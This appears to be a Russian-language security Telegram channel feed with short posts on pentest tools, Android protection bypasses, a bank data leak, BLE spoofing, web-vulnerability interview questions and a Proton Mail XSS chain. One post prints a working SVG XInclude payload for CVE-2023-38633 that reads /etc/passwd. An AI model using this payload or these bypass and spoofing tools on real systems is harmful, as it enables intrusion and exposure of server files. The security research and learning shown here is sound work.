Cybred
9.78K subscribers
402 photos
35 videos
100 files
611 links
Download Telegram
https://github.com/noraj/haiti

CLI-утилита для идентификации хэшей. Лучшая альтернатива дефолтного hash-identifier из Kali Linux. Поддерживает более 519 алгоритмов и выдает готовые команды для John The Ripper и hashcat.
https://github.com/jehna/humanify/

LLM-Based деобфускатор для Javascript. Под капотом использует Babel — для восстановления исходников на уровне AST, webcrack — для нормализации и ChatGPT/llama2 — чтобы вернуть переменным человекочитаемый вид.

Гайд по комплексному анализу Javascript файлов в 2023 году я публиковал тут.
Bypassing Hardened Android Applications

Как обойти проверки:
на обнаружение root
на запуск приложения в эмуляторе
на запущенную Frida
кастомную реализацию SSL-пиннинга

Статья про реверс современных мобильные приложений (например, банковских) со множеством защитных механизмов, с которыми они поставляются "из коробки".
The Complete Guide to CORS (In)Security
Утечка МТС Банк с собственной командой безопасности, которая "действует быстрее, чем злоумышленники".

В архиве 3 файла: main, contacts и cards. В каждом около 1кк строк со следующими данными:
ФИО
гражданство
пол
дата рождения
номер телефона
email

Кроме привычных данных, которые мы видим в каждой утечке, в файле cards собрана информация о выпущенных картах:
имя владельца
маскированный PAN
дата выдачи
дата окончания срока действия
тип карты

Прошлые утечки:
Литрес
Сколково
BreachForums
https://github.com/ECTO-1A/AppleJuice

Несколько участников хакерской конференции Def Con сообщили, что у них на смартфонах появлялись загадочные и настойчивые всплывающие окна с предложениями использовать Apple ID для подключения к Apple TV и поделиться паролем.

Утилита для спуфинга Apple BLE Proximity Pairing Messages и отправки сообщений всем айфонам, находящимся в округе.
33 вопроса о веб-уязвимостях для подготовки к собеседованию. Сложность — средняя, некоторые вопросы с подвохом. Если смогли ответить на большую часть без подсказок, — можете смело идти и получать свой оффер.

1. В чем разница между Web Cache Deception и Web Cache Poisoning?
2. Какие два критерия должны быть соблюдены для эксплуатации Session Fixation?
3. В чем разница между Base64- и Base64URL-кодированием?
4. Назовите 5 (или более типов) XSS.
5. Как работает булевое "Error" при эксплуатации Blind SQL Injection?
6. Что такое Same-Origin Policy (SOP) и как это работает?
7. Как работает TE.TE вариант HTTP Request Smuggling?
8. Что такое DOM Clobbering и как его можно использовать для обхода некоторых санитайзеров при эксплуатации XSS?
9. Опишите, как можно использовать HTTP Parameter Pollution для обхода WAF.
10. Опишите, что такое IDOR и объясните, чем его устранение отличается от устранения других уязвимостей контроля доступа.
11. Что такое JWK и JKU, и чем они отличаются?
12. Что такое бизнес-логика в контексте веб-приложений и чем тестирование уязвимостей бизнес-логики отличается от поиска XSS, SQLi и т. д.?
13. Приведите пример 3 пэйлоадов, которые можно использовать для идентификации используемого Template Processor при эксплуатации SSTI.
14. Зачем нужен заголовок Sec-WebSocket-Key?
15. Что позволяет сделать значение unsafe-inline, если оно используется в директиве script-src?
16. Приведите пример аутентификации без сохранения состояния и опишите уязвимость этого механизма аутентификации.
17. Опишите три способа предотвращения CSRF.
18. Что такое XML parameter entities и какие ограничения они имеют при эксплуатации XXE?
19. Какие рекомендации вы бы дали клиенту по исправлению DOM Based XSS?
20. Какие условия должны быть выполнены, чтобы "предотвратить" отправку Preflight-запроса браузером?
21. Опишите три способа эксплуатации Insecure Deserialization.
22. Перечислите проверки, которые может выполнять приложение, чтобы убедиться, что файлы не содержат вредоносного содержимого и могут быть загружены только в разрешенные каталоги.
23. Как работает Mass Assignment и каковы возможные последствия использования такой уязвимости?
24. Что такое GraphQL batching и как его использование может помочь обойти Rate Limit?
25. Что такое type juggling и как JSON помогает эксплуатировать уязвимости этого типа?
26. Опишите три метода, которые можно использовать для обнаружения конфиденциальных данных, предоставляемых приложением.
27. Опишите атрибуты запроса, которые делают его фактически невосприимчивым к CSRF.
28. Назовите 5 уязвимостей, которые потенциально могут привести к OS command execution в веб-приложении.
29. Что такое Prototype Pollution и к каким последствиям может привести эксплуатации в клиентском и в серверном вариантах?
30. Опишите, как вы будете тестировать уязвимости вертикального контроля доступа в приложении с 20 ролями и более чем 300 различными «функциональными» запросами.
31. При каких обстоятельствах сохраняется инстанс Session Storage у вкладки?
32. Как еще можно найти и эксплуатировать XXE, кроме загрузки XML через форму?
33. Назовите распространенные уязвимости, которые можно обнаружить при сбросе пароля.
https://github.com/hahwul/noir

Attack Surface Detector утилита для составления поверхности атаки на основе сканирования исходного кода.

Умеет:
определять язык и фреймворк, на которых написано приложение
находить все эндпоинты, параметры, методы, заголовки и веб-страницы на основе анализа исходников
экспортировать результаты для импорта в Owasp ZAP, BurpSuite, Caido.

Поддерживает фреймворки на Java, Javascript, Ruby и Python: Echo, Gin, Django, Flask, Rails, Sinatra, Spring, Kemal, Express.
https://github.com/arkadiyt/bounty-targets-data

Репозиторий со всеми скоупами с Bug Bounty площадок:
Bugcrowd
Hackerone
Intigriti
YesWeHack
Hackenproof
Federacy

Использую сам, чтобы запускать регулярные сканы. Данные в json, обновляются каждые полчаса.
https://www.canva.dev/blog/engineering/when-url-parsers-disagree-cve-2023-38633/

PoC для CVE-2023-38633. Если удалось обнаружить, что сайт разрешает загрузку SVG-файлов, стоит попробовать проэксплуатировать недавно найденную CVE в пакете librsvg.

Из-за особенностей обработки строк с символами "#" и "?", парсеры считают безопасным пэйлоад .?../../../../../../../etc/passwd, а в полученном SVG возвращается содержимое указанного /etc/passwd.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
<rect width="300" height="300" style="fill:rgb(255,204,204);" />
<text x="0" y="100">
<xi:include href=".?../../../../../../../etc/passwd" parse="text" encoding="ASCII">
<xi:fallback>file not found</xi:fallback>
</xi:include>
</text>
</svg>

Работает до версии 2.56.3.
https://github.com/johnnykv/heralding/

Sometimes you just want a simple honeypot that collects credentials, nothing more. Heralding is that honeypot!

Currently the following protocols are supported: ftp, telnet, ssh, http, https, pop3, pop3s, imap, imaps, smtp, vnc, postgresql and socks5.
https://www.sonarsource.com/blog/code-vulnerabilities-leak-emails-in-proton-mail/

Пятничное чтиво про сложные XSS в приватных почтовых сервисах Proton Mail, Skiff и Tutanota.

Описали пока только Proton Mail и цепочка выглядит так:
1. Обман Dom Purify, благодаря неправильному контексту с помощью тега <style> и тем, как он санитизирует его в HTML и SVG, а также последующей обработкой.
2. Побег из Sandbox Iframe из-за атрибута allow-scripts, который "эксклюзивно" отображался для браузера Safari.
3. Обход CSP с крутой эксфильтрацией через blob и cross-fade() из CSS.

Все это приводит к тому, что, отправив сообщение жертве, атакующий может:
прочитать ее электронные письма расшифрованном виде
отправить электронные письма от её имени
украсть криптографические ключи.